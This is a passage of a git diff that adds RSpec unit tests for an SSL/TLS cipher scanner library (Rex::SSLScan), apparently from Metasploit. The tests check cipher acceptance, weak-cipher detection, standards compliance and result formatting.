accepted ciphers" do + subject.supports_sslv3?.should == false + end + it "should return true if there are accepted ciphers" do + subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted) + subject.supports_sslv3?.should == true + end + end + context "for TLSv1" do + it "should return false if there are no accepted ciphers" do + subject.supports_tlsv1?.should == false + end + it "should return true if there are accepted ciphers" do + subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted) + subject.supports_tlsv1?.should == true + end + end + context "for SSL at large" do + it "should return false if there are no accepted ciphers" do + subject.supports_ssl?.should == false + end + it "should return true if there are accepted ciphers" do + subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted) + subject.supports_ssl?.should == true + end + end + end + + context "checking for weak ciphers" do + context "when weak ciphers are supported" do + before(:each) do + subject.add_cipher(:SSLv3, "EXP-RC4-MD5", 40, :accepted) + subject.add_cipher(:SSLv3, "DES-CBC-SHA", 56, :accepted) + end + it "should return an array of weak ciphers from #weak_ciphers" do + weak = subject.weak_ciphers + weak.class.should == Array + weak.each do |cipher| + cipher[:weak].should == true + end + weak.count.should == 2 + end + + it "should return true from #supports_weak_ciphers" do + subject.supports_weak_ciphers?.should == true + end + end + + context "when no weak ciphers are supported" do + before(:each) do + subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted) + subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted) + subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted) + end + it "should return an empty array from #weak_ciphers" do + subject.weak_ciphers.should == [] + end + + it "should return false from #supports_weak_ciphers" do + subject.supports_weak_ciphers?.should == false + end + end + end + + context "checking for standards compliance" do + it "should return true if there is no SSL support" do + subject.standards_compliant?.should == true + end + + it "should return false if SSLv2 is supported or raise an SSLv2 exception" do + begin + subject.add_cipher(:SSLv2, "DES-CBC3-MD5", 168, :accepted) + subject.standards_compliant?.should == false + rescue ArgumentError => e + e.message.should == "unknown SSL method `SSLv2'." + end + end + + it "should return false if weak ciphers are supported" do + subject.add_cipher(:SSLv3, "EXP-RC2-CBC-MD5", 40, :accepted) + subject.standards_compliant?.should == false + end + + it "should return true if SSLv2 and Weak Ciphers are disabled" do + subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted) + subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted) + subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted) + subject.standards_compliant?.should == true + end + end + + context "when printing the results" do + context "when OpenSSL is compiled without SSLv2" do + before(:each) do + subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted) + subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted) + subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted) + subject.openssl_sslv2 = false + end + it "should warn the user" do + subject.to_s.should include "*** WARNING: Your OS hates freedom! Your OpenSSL libs are compiled without SSLv2 support!" + end + end + + context "when we have SSL results" do + before(:each) do + subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted) + subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted) + subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted) + subject.add_cipher(:SSLv3, "EXP-RC2-CBC-MD5", 40, :accepted) + + cert = OpenSSL::X509::Certificate.new + key = OpenSSL::PKey::RSA.new 2048 + cert.version = 2 # + cert.serial = 1 + cert.subject = OpenSSL::X509::Name.parse "/DC=org/DC=ruby-lang/CN=Ruby CA" + cert.issuer = cert.subject + cert.public_key = key.public_key + cert.not_before = Time.now + cert.not_after = cert.not_before + 2 * 365 * 24 * 60 * 60 # 2 + + subject.cert = cert + end + + it "should contain the certificate" do + subject.to_s.should include "Issuer: DC=org, DC=ruby-lang, CN=Ruby CA" + subject.to_s.should include "Subject: DC=org, DC=ruby-lang, CN=Ruby CA" + end + + it "should have a table with our SSL Cipher Results" do + subject.to_s.should include "Accepted * SSLv3 40 EXP-RC2-CBC-MD5" + subject.to_s.should include "Accepted SSLv3 128 AES128-SHA" + subject.to_s.should include "Accepted SSLv3 256 AES256-SHA" + subject.to_s.should include "Accepted TLSv1 256 AES256-SHA" + end + end + + it "should return an appropriate message when SSL is not supported" do + subject.stub(:supports_ssl?).and_return(false) + subject.to_s.should == "Server does not appear to support SSL on this port!" + end + + + end + +end diff --git a/spec/lib/rex/sslscan/scanner_spec.rb b/spec/lib/rex/sslscan/scanner_spec.rb new file mode 100644 index 0000000000..5ea65b3ebf --- /dev/null +++ b/spec/lib/rex/sslscan/scanner_spec.rb @@ -0,0 +1,106 @@ +require 'rex/sslscan/scanner' +require 'rex/thread_factory' +require 'rex/text' +require 'rex/compat' + +describe Rex::SSLScan::Scanner do + + subject{Rex::SSLScan::Scanner.new("google.com", 443)} + + it { should respond_to :host } + it { should respond_to :port } + it { should respond_to :timeout } + it { should respond_to :valid? } + + context "when validating the scanner config" do + it "should return true when given a valid config" do + subject.valid?.should == true + end + + it "should return false if given an invalid host" do + subject.host = nil + subject.valid?.should == false + end + + it "should return false if given an invalid port" do + subject.port = nil + subject.valid?.should == false + end + + it "should return false if given an invalid timeout" do + subject.timeout = nil + subject.valid?.should == false + end + end + + context "when testing a single cipher" do + context "an exception should be raised if" do + it "has an invalid scanner configuration" do + subject.host =nil + expect{ subject.test_cipher(:SSLv2, "AES128-SHA")}.to raise_error + end + + it "is given an invalid SSL version" do + expect{ subject.test_cipher(:SSLv5, "AES128-SHA")}.to raise_error + end + + it "is given an invalid cipher" do + expect{ subject.test_cipher(:SSLv2, "FOO128-SHA")}.to raise_error + end + + it "is given an invalid cipher for the SSL Version" do + expect{ subject.test_cipher(:SSLv3, 'DES-CBC3-MD5')}.to raise_error + end + end + + context ":rejected should be returned if" do + it "scans a server that doesn't support the supplied SSL version" do + subject.test_cipher(:SSLv3, "DES-CBC-SHA").should == :rejected + end + + it "scans a server that doesn't support the cipher" do + subject.test_cipher(:SSLv3, "DHE-DSS-AES256-SHA").should == :rejected + end + end + + context ":accepted should be returned if" do + it "scans a server that accepts the given cipher" do + subject.test_cipher(:SSLv3, "AES256-SHA").should == :accepted + end + end + end + + context "when retrieving the cert" do + it "should return nil if it can't connect" do + subject.get_cert(:SSLv3, "DES-CBC-SHA").should == nil + end + + it "should return an X509 cert if it can connect" do + subject.get_cert(:SSLv3, "AES256-SHA").class.should == OpenSSL::X509::Certificate + end + end + + context "when scanning https://google.com" do + it "should return a Result object" do + result = subject.scan + result.class.should == Rex::SSLScan::Result + end + + context "if SSLv2 is not available locally" do + before(:each) do + subject.stub(:check_opensslv2).and_return(false) + subject.send(:initialize, 'google.com', 443) + end + it "should mark SSLv2 as unsupported" do + subject.supported_versions.should_not include :SSLv2 + subject.sslv2.should == false + end + + it "should not test any SSLv2 ciphers" do + res = subject.scan + res.sslv2.should == [] + end + end + end + +end \ No newline at end of file